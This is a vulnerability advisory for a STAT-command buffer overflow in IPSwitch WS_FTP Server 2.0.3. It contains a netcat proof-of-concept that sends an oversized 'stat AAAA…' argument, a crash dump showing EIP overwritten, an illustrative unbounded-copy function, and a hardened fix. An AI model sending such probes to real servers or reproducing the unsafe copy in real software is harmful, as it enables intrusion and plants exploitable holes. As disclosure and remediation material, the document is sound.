Reported November 5, 2001, by Defcom Labs.

VERSION AFFECTED

  • IPSwitch WS_FTP FTP Server 2.0.3 for Windows XP, Windows 2000, and Windows NT

 

DESCRIPTION
A vulnerability in IPSwitch's WS_FTP Server 2.0.3 lets a remote attacker gain system-level access to servers running the FTP daemon. The flaw is a buffer overrun in the code that parses the STAT command: sending a STAT command whose argument is longer than 479 bytes overflows a fixed-size buffer and overwrites the saved frame pointer and return address, so the attacker controls the value loaded into EIP (in the demonstration below both EBP and EIP read 0x41414141, the 'A' bytes of the argument). In the demonstration the command is issued after an anonymous login, so any client able to log in to the service can trigger the fault.
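The overrun pattern the description attributes to the STAT handler, as an added illustration in C that is not WS_FTP's code (its source is not public): a command parser with an assumed 480-byte fixed buffer (479 bytes plus the terminator, matching the advisory's threshold), the unbounded copy that produces the 0x41414141 frame, and a bounded replacement that rejects oversized arguments before copying. The function names, the buffer size and the probe line are assumptions; the probe is constructed input, not a capture.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

/* Assumed layout: the advisory says an argument longer than 479 bytes triggers
 * the overflow, consistent with a 480-byte fixed buffer (479 bytes plus NUL).
 * This is a reconstruction for illustration, not WS_FTP's actual code. */
#define STAT_BUF     480
#define STAT_MAX_ARG (STAT_BUF - 1)

/* Locate the argument of an FTP STAT line: skip the verb and the whitespace
 * after it, and measure up to (not including) CR/LF. Returns NULL if the
 * line is not a STAT command. STAT with no argument is legal, so *len may be 0. */
static const char *stat_argument(const char *line, size_t *len)
{
    if (strncasecmp(line, "stat", 4) != 0)
        return NULL;
    const char *p = line + 4;
    if (*p != '\0' && *p != ' ' && *p != '\t' && *p != '\r' && *p != '\n')
        return NULL;                     /* e.g. "STATUS": a different verb */
    while (*p == ' ' || *p == '\t')
        p++;
    *len = strcspn(p, "\r\n");
    return p;
}

/* The pattern the advisory describes: fixed stack buffer, copy length taken
 * from the client. With n > STAT_MAX_ARG the copy runs past arg[] into the
 * saved frame pointer and return address, which is why the debugger shows
 * ebp=41414141 eip=41414141. Shown for contrast; nothing here calls it. */
static void handle_stat_unsafe(const char *line)
{
    char arg[STAT_BUF];
    size_t n;
    const char *a = stat_argument(line, &n);
    if (a == NULL)
        return;
    memcpy(arg, a, n);                   /* unbounded: n is attacker-controlled */
    arg[n] = '\0';
    printf("STAT %s\n", arg);
}

/* Hardened form: check the length against the destination before copying and
 * refuse anything that does not fit. Returns the argument length on success,
 * -1 if the line is not a STAT command, -2 if the argument is too long
 * (the server should answer 501 and keep the session alive). */
static int handle_stat_safe(const char *line, char *out, size_t outsz)
{
    size_t n;
    const char *a = stat_argument(line, &n);
    if (a == NULL)
        return -1;
    if (n > STAT_MAX_ARG || n >= outsz)
        return -2;
    memcpy(out, a, n);
    out[n] = '\0';
    return (int)n;
}

/* Build the probe the demonstration sends: "stat " + n 'A's + CRLF.
 * Caller frees the result. Constructed input, not a capture. */
static char *build_stat_line(size_t n)
{
    char *s = malloc(5 + n + 3);
    if (s == NULL)
        return NULL;
    memcpy(s, "stat ", 5);
    memset(s + 5, 'A', n);
    memcpy(s + 5 + n, "\r\n", 3);        /* copies the terminating NUL too */
    return s;
}

int main(void)
{
    char out[STAT_BUF];
    size_t lens[] = { 479, 480, 1000 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        char *line = build_stat_line(lens[i]);
        int rc = handle_stat_safe(line, out, sizeof out);
        printf("argument of %4zu bytes: %s\n", lens[i],
               rc >= 0 ? "accepted" : "rejected (would have overflowed)");
        free(line);
    }
    (void)handle_stat_unsafe;            /* keep the contrast function referenced */
    return 0;
}
```

The check in handle_stat_safe is made against the destination size, not against a separately maintained constant, so the limit cannot drift from the buffer it protects; a 479-byte argument is accepted, 480 and above are refused before any byte is copied.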


DEMONSTRATION

Defcom Labs provided the following demonstration as proof-of-concept. The first block is the client side of the session (netcat to port 21); the second is the server's debug output, ending in the access violation with the saved frame pointer and return address overwritten by the 0x41 ('A') bytes of the argument:

  C:\tools\web>nc localhost 21
  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  220-Wed Aug 08 19:57:40 2001
  220-30 days remaining on evaluation.
  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAA

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
  SetFolder = C:\program\iFtpSvc\helig
  SetFolder = C:\program\iFtpSvc\helig\public
  SetFolder = C:/program/iFtpSvc/helig
  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
  (A1)
  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
  esi=0067c280 edi=00130178
  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
  41414141 ??               ???

VENDOR RESPONSE

The vendor, IPSwitch, released version 2.0.4 to correct this vulnerability. Vulnerable hosts are easy to identify: the server announces itself as "WS_FTP Server 2.0.3" in its 220 greeting (see the demonstration above), so the version is visible to any client before authentication.

 

CREDIT
Discovered by Andreas Junestam and Janne Sarendal of Defcom Labs.